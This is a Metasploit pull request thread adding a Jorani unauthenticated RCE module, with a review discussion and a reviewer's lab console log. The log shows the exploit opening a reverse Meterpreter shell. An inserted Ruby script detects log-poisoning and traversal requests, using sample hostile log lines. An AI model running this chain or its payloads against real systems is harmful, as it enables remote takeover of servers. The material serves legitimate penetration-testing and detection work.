
Add exploit for unauth RCE Jorani #18123

Merged
merged 14 commits into from Aug 18, 2023

Conversation

Guilhem7
Contributor

@Guilhem7 Guilhem7 commented Jun 19, 2023

This PR adds a new exploit module for an unauthenticated RCE.

Verification

You need to deploy a vulnerable Jorani instance (version <= 1.0.0)

  • Start msfconsole
  • use exploit/multi/php/jorani_path_traversal
  • set your options...
  • check
  • run

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to msfdev@metasploit.com. Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the wiki.

@adfoster-r7 adfoster-r7 added needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Jun 19, 2023
@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

Contributor

@jheysel-r7 jheysel-r7 left a comment


Thanks for the module @Guilhem7! I think this module might benefit from using the Command Stagers mixin we have in Metasploit. You can read more about the mixin here:
https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html

Command stagers allow modules that exploit command execution or code injection vulnerabilities to more easily exploit a variety of different payloads. If you have any questions let me know I'd be happy to help you out!

'uri' => "#{uri}/session/login"
)

print_status('Recovering CSRF token')

Move those lines before the whole poison_payload/header_name/… dance, since there is no need to execute them before.

@Guilhem7
Contributor Author

@jheysel-r7 thanks for the help, however I'm not sure Msf::Exploit::CmdStager will be helpful here, as this CVE exploits PHP code injection and not system command injection. It seems (from the documentation you provided) that it is used for system command injection.

@gwillcox-r7 gwillcox-r7 self-assigned this Jun 27, 2023
@gwillcox-r7
Contributor

@Guilhem7 Fixed up what I could but will need your input on some points. Also awaiting documentation from you for this PR. Please refer to https://docs.metasploit.com/docs/development/get-started/creating-your-first-pr.html#writing-documentation if you need further information on how to do this.

@gwillcox-r7 gwillcox-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Jun 27, 2023
@gwillcox-r7 gwillcox-r7 removed their assignment Jun 27, 2023
…able. Adding the documentation after checking it with the dev tool

Log poisoning is possible, so an authenticated attacker can execute arbitrary code.

Finally, the controller responsible for recovering a page doesn't properly redirect requests made by Ajax.

How is this relevant to the exploit? The impact here isn't really explained as to what this allows an attacker to do. For all I know this is just a bug with no real impact. Please explain why this is useful for an attacker and what impact it has on the exploitation process in terms of what it can be used for and how this contributes to a full exploit.

@gwillcox-r7 gwillcox-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Jun 30, 2023

Guilhem7 and others added 2 commits July 11, 2023 09:28
Co-authored-by: Brendan <bwatters@rapid7.com>
Co-authored-by: Brendan <bwatters@rapid7.com>
@jheysel-r7 jheysel-r7 removed the needs-linting The module needs additional work to pass our automated linting rules label Aug 17, 2023
@jheysel-r7 jheysel-r7 self-assigned this Aug 17, 2023
Contributor

@jheysel-r7 jheysel-r7 left a comment


Thanks for the module @Guilhem7. I've made some minor changes and tested the module successfully. Looks good 👍

msf6 > use jorani
[*] Using configured payload php/meterpreter/reverse_tcp

Matching Modules
================

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/php/jorani_path_trav  2023-01-06       excellent  Yes    Jorani unauthenticated Remote Code Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/php/jorani_path_trav

[*] Using exploit/multi/php/jorani_path_trav
msf6 exploit(multi/php/jorani_path_trav) > options

Module options (exploit/multi/php/jorani_path_trav):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path of Jorani
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Jorani < 1.0.2



View the full module info with the info, or info -d command.

msf6 exploit(multi/php/jorani_path_trav) > set rhosts 172.16.199.158
rhosts => 172.16.199.158
msf6 exploit(multi/php/jorani_path_trav) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/php/jorani_path_trav) > set rport 80
rport => 80
msf6 exploit(multi/php/jorani_path_trav) > set ssl false
[!] Changing the SSL option's value may require changing RPORT!
ssl => false
msf6 exploit(multi/php/jorani_path_trav) > set targeturi jorani
targeturi => jorani
msf6 exploit(multi/php/jorani_path_trav) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking Jorani version
[+] Jorani seems to be running on the target!
[+] Found version: 1.0.0
[+] The target appears to be vulnerable.
[*] Trying to exploit LFI
[*] Recovering CSRF token
[+] CSRF found: be7e8205ad5f1fae2834478acdd0b546
[*] Poisoning log with payload..
[*] Sending 1st payload
[*] Including poisoned log file log-2023-08-18.php.
[+] Triggering payload
[*] Sending stage (39927 bytes) to 172.16.199.158
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.158:39624) at 2023-08-18 15:01:55 -0400

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.15.0-79-generic #86~20.04.2-Ubuntu SMP Mon Jul 17 23:27:17 UTC 2023 x86_64
Meterpreter : php/linux
meterpreter > exit

@jheysel-r7 jheysel-r7 merged commit 5fdc992 into rapid7:master Aug 18, 2023
34 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Aug 18, 2023
@jheysel-r7
Contributor

jheysel-r7 commented Aug 18, 2023

Release Notes

This PR adds a module that chains together a log poisoning LFI, redirection bypass and a path traversal vulnerability to obtain unauthenticated RCE.
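The chain in the release note has two stages a defender can look for in ordinary web-server access logs: a request that plants a PHP tag in a field the application logs (the poisoning step), followed by a request whose path carries a directory-traversal sequence (the include step). The script below is an added illustration for this thread, not code from the Jorani module or the Metasploit project. It assumes a combined-log-format access log; the sample lines, the `/app/...` routes and the client addresses are constructed for the example and are not Jorani's real URLs or the PR author's test environment.

```ruby
# Added example (not part of the Metasploit module or this PR): scan access-log
# lines for the two ingredients of a log-poisoning LFI chain and report source
# addresses that show both stages. Log format and sample data are constructed.

require 'cgi'

# Combined log format: ip - - [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<path>\S+) [^"]*" (?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<ua>[^"]*)"\z/

# Constructed sample log; the routes are placeholders, not Jorani's real routes.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [18/Aug/2023:15:01:40 -0400] "GET /app/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.0.0.5 - - [18/Aug/2023:15:01:41 -0400] "GET /app/docs/notes..txt HTTP/1.1" 200 80 "-" "Mozilla/5.0"
  203.0.113.9 - - [18/Aug/2023:15:01:50 -0400] "POST /app/login HTTP/1.1" 302 0 "-" "<?php echo 'poison-test'; ?>"
  203.0.113.9 - - [18/Aug/2023:15:01:55 -0400] "GET /app/page?file=..%2F..%2Flogs%2Fapp.log HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
  198.51.100.4 - - [18/Aug/2023:15:02:10 -0400] "GET /app/page?file=..%252F..%252Flogs%252Fapp.log HTTP/1.1" 404 0 "-" "curl/8.0"
LOG

# Parse one line into a hash of named fields, or nil if it does not match the format.
def parse_line(line)
  m = LOG_RE.match(line.strip)
  return nil unless m
  m.names.each_with_object({}) { |n, h| h[n.to_sym] = m[n] }
end

# Decode twice so double-encoded sequences such as %252e%252e are also caught.
def decoded(s)
  CGI.unescape(CGI.unescape(s))
end

# A PHP open tag inside a logged field is the marker of a log-poisoning attempt.
# The word boundary keeps "<?xml" processing instructions from matching.
def php_tag?(s)
  decoded(s).match?(/<\?(php\b|=)/i)
end

# Traversal: a parent-directory step (either separator) or a NUL truncation byte.
def traversal?(path)
  d = decoded(path)
  d.include?('../') || d.include?('..\\') || d.include?("\0")
end

# Tag one parsed entry with the stages it exhibits.
def classify(entry)
  tags = []
  tags << :poison_attempt if [entry[:ua], entry[:referer], entry[:path]].any? { |f| php_tag?(f) }
  tags << :traversal if traversal?(entry[:path])
  tags
end

# Returns { findings: { ip => [stages] }, chained: [ips showing both stages] }.
def scan(lines)
  per_ip = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    e = parse_line(line)
    next unless e
    t = classify(e)
    per_ip[e[:ip]] |= t unless t.empty?
  end
  chained = per_ip.select { |_, t| t.include?(:poison_attempt) && t.include?(:traversal) }.keys
  { findings: per_ip, chained: chained }
end

if __FILE__ == $0
  result = scan(SAMPLE_LOG.lines)
  result[:findings].each { |ip, tags| puts "#{ip}: #{tags.join(', ')}" }
  puts "both stages seen from: #{result[:chained].join(', ')}"
end
```

Correlating by client address is deliberate: a lone `<?php` in a User-Agent is noisy on an internet-facing host, and a lone traversal probe is routine scanner traffic, but the same source doing both within a short window is the signature of this particular chain and is worth an alert.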

@Guilhem7
Contributor Author

Hey, thanks a lot for the merge! 😄

@Guilhem7 Guilhem7 deleted the jorani_exploit_module branch August 19, 2023 16:51